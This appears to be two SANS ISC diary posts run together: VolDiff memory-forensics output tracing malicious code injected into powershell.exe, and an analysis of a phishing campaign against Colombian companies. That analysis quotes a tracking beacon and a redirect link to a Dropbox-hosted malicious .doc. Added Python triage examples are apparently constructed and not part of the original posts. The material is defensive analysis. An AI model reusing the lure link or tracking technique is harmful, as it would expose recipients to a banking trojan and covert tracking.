0x000000013eac2060 cmd.exe            2912   1284 0x0000000055564000 2015-04-26 19:16:50 UTC+0000   2015-04-26 19:19:41 UTC+0000  
0x000000013eb65060 powershell.exe     1284   2244 0x00000000bc783000 2015-04-26 18:17:32 UTC+0000                                 
0x000000013f6a8060 cmd.exe            2288   1284 0x000000006dd6f000 2015-04-26 19:19:44 UTC+0000   2015-04-26 19:55:20 UTC+0000  
0x000000013eb65060 powershell.exe     1284   2244 0x00000000bc783000 2015-04-26 18:17:32 UTC+0000                
Suspicious new ldrmodules entries
===========================================================================
 1284 powershell.exe       0x000000006df70000 False  False  False \Windows\SysWOW64\schannel.dll
 2396 powershell.exe       0x000000006e010000 False  False  False \Windows\SysWOW64\credssp.dll
 
Suspicious new executables
===========================================================================
powershell
Suspicious new malfind entries
===========================================================================
Process: powershell.exe Pid: 2396 Address: 0x6400000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 216, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x06400000  4d 5a e8 00 00 00 00 5b 52 45 55 89 e5 81 c3 d0   MZ.....[REU.....
Process: powershell.exe Pid: 1284 Address: 0x4ff0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 33, MemCommit: 1, PrivateMemory: 1, Protection: 6
0x04ff0000  4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00   MZ..............
Suspicious new getsids entries
===========================================================================
 
powershell.exe (1284): S-1-5-21-1828531342-1736868966-1560356964-513 (Domain Users)
powershell.exe (1284): S-1-1-0 (Everyone)
powershell.exe (1284): S-1-5-114
powershell.exe (1284): S-1-5-32-544 (Administrators)
powershell.exe (1284): S-1-5-32-545 (Users)
powershell.exe (1284): S-1-5-4 (Interactive)
powershell.exe (1284): S-1-2-1 (Console Logon (Users who are logged onto the physical console))
powershell.exe (1284): S-1-5-11 (Authenticated Users)
powershell.exe (1284): S-1-5-15 (This Organization)
powershell.exe (1284): S-1-5-113
powershell.exe (1284): S-1-5-5-0-194227 (Logon Session)
powershell.exe (1284): S-1-2-0 (Local (Users with the ability to log in locally))
powershell.exe (1284): S-1-5-64-10 (NTLM Authentication)
powershell.exe (1284): S-1-16-12288 (High Mandatory Level) 
Yep, powershell.exe definitely did it. :-) Great memory analysis tool from Houcem Hachicha (@aim4r). Give it a try!
Pop quiz: Under the malfind results, in the ASCII readable output dumped from the hex, what jumps out at you? First right answer to @sans_isc and @holisticinfosec in the same Tweet, one per reader, wins some insignificant yet enjoyable schwag.
Cheers!
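The differential idea behind VolDiff, as an added example that is not the tool's own code: parse the Volatility pslist output from both images and report what exists only after the compromise, then follow PPID links from a suspicious PID. The baseline lines are constructed, and PID 2396 is assumed to be a child of explorer.exe 2244; the compromised image adds the entries VolDiff reported above.

```python
import re
from collections import namedtuple

# Matches the Volatility 2 pslist layout VolDiff prints above:
# Offset Name PID PPID Thds Hnds Sess Wow64 Start [Exit]
PSLIST_RE = re.compile(
    r"^(0x[0-9a-fA-F]+)\s+(\S+)\s+(\d+)\s+(\d+)(?:\s+\S+){4}\s+"
    r"(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} UTC\+0000)"
)
Proc = namedtuple("Proc", "offset name pid ppid start")

def parse_pslist(text):
    """Parse pslist lines; header and separator lines do not match and are skipped."""
    out = []
    for line in text.splitlines():
        m = PSLIST_RE.match(line.strip())
        if m:
            out.append(Proc(m[1], m[2], int(m[3]), int(m[4]), m[5]))
    return out

def new_entries(baseline, compromised):
    """Processes in the second image only, keyed on name/PID/PPID: a process that
    survives both captures keeps its key, a recycled PID under a new parent is new."""
    seen = {(p.name, p.pid, p.ppid) for p in baseline}
    return [p for p in compromised if (p.name, p.pid, p.ppid) not in seen]

def descendants(procs, root_pid):
    """PIDs that chain back to root_pid through PPID links (the powershell.exe tree)."""
    children = {}
    for p in procs:
        children.setdefault(p.ppid, []).append(p.pid)
    found, todo = set(), [root_pid]
    while todo:
        for child in children.get(todo.pop(), []):
            if child not in found:
                found.add(child)
                todo.append(child)
    return found

# Constructed baseline (not from the diary); PID 2396 is assumed to be a child of
# explorer.exe 2244. The compromised image adds the lines VolDiff reported above.
BASELINE = """\
0xfffffa8030c4f040 System                    4      0     80      490 ------      0 2015-04-26 17:40:02 UTC+0000
0xfffffa8031b3a060 explorer.exe           2244   2200     30      900      1      0 2015-04-26 17:41:10 UTC+0000
0xfffffa80329a1060 powershell.exe         2396   2244      5      250      1      0 2015-04-26 17:56:07 UTC+0000
"""
COMPROMISED = BASELINE + """\
0xfffffa8031da1400 cmd.exe                1676   2396      0 --------      1      0 2015-04-26 18:11:52 UTC+0000   2015-04-26 18:15:50 UTC+0000
0xfffffa8033b17060 powershell.exe         2604   1676      5      250      1      1 2015-04-26 18:12:58 UTC+0000
"""
```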
Massive malware spam campaign to corporate domains in Colombia
There was a massive malware spam campaign directed at corporate domains in Colombia. The following is the e-mail that was received:

Now this e-mail has two interesting aspects:
- It tracks whether the user reads the message by using the Google Analytics API, invoking the following:
	img src=3Dhttp://www.google-analytics.com/c= ollect?v=3D1&tid=3DUA-62115737-1&[email protected]&t=3De= vent&[email protected]&ea=3Dopens&[email protected]&cs=3Dnewsletter&cm=3Demail&cn=3D062413&cm1=3D1?/ 
- It has a link to a Dropbox file masked with the Google URL redirection script:
	https://www.google.com/url?q=3Dhttps%3A%2F%= 2Fwww.dropbox.com%2Fs%2Fvs5hho625v7ibw5%2FACH=5Ftransaction5721.doc%3Fdl%3D= 1&sa=3DD&sntz=3D1&usg=3DAFQjCNFADf1fsGqdWqwSOnMC6XyLMHrL2w 
When opened, this document runs an embedded Visual Basic script that downloads a known trojan password stealer designed for Colombian banks.
This domain uses a private registration service, which hides the identity of the registrar:
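How a triage script can recover what the two links above really do, as an added example that is not part of the diary: decode the quoted-printable encoding seen in the raw message, unwrap the google.com/url redirect to its true destination, and pull the identifying parameters out of the Google Analytics open-tracking hit. Both fragments are constructed in the shape of the originals; the Dropbox path, tracking ID, signature and recipient address are placeholders.

```python
import quopri
from urllib.parse import parse_qs, urlparse

# Constructed quoted-printable fragments shaped like the two links in the message above.
# "=3D" is an encoded "=", "=5F" an encoded "_", and "=" at end of line is a soft break.
QP_REDIRECT = (
    "https://www.google.com/url?q=3Dhttps%3A%2F%2Fwww.dropbox.com%2Fs%2FPLACEHOLDER%=\n"
    "2FACH=5Ftransaction.doc%3Fdl%3D1&sa=3DD&sntz=3D1&usg=3DPLACEHOLDER"
)
QP_BEACON = (
    "http://www.google-analytics.com/c=\n"
    "ollect?v=3D1&tid=3DUA-000000-0&cid=3Duser%40example.com&t=3De=\n"
    "vent&ec=3Duser%40example.com&ea=3Dopens&cs=3Dnewsletter&cm=3Demail"
)


def decode_qp(fragment):
    """Undo quoted-printable so the URL can be parsed as the mail client would see it."""
    return quopri.decodestring(fragment.encode()).decode()


def final_destination(url):
    """Unwrap a google.com/url redirect and return where the click really goes.

    Any other URL is returned unchanged, so the caller always gets a destination.
    """
    parts = urlparse(url)
    if parts.hostname in ("www.google.com", "google.com") and parts.path == "/url":
        target = parse_qs(parts.query).get("q")
        if target:
            return target[0]  # parse_qs already percent-decodes the value
    return url


def beacon_fields(url):
    """Identify a Google Analytics collect hit used as an open-tracking pixel and
    return who was tracked (cid), the event (ea), the property (tid) and the
    campaign source/medium (cs/cm); None if the URL is not such a beacon."""
    parts = urlparse(url)
    if not parts.hostname or not parts.hostname.endswith("google-analytics.com"):
        return None
    q = parse_qs(parts.query)
    return {k: q[k][0] for k in ("tid", "cid", "ea", "cs", "cm") if k in q}
```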

Be careful when opening unknown e-mails. You could be leaking information and compromising your computer, even when you see a Google domain in the URLs.
Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org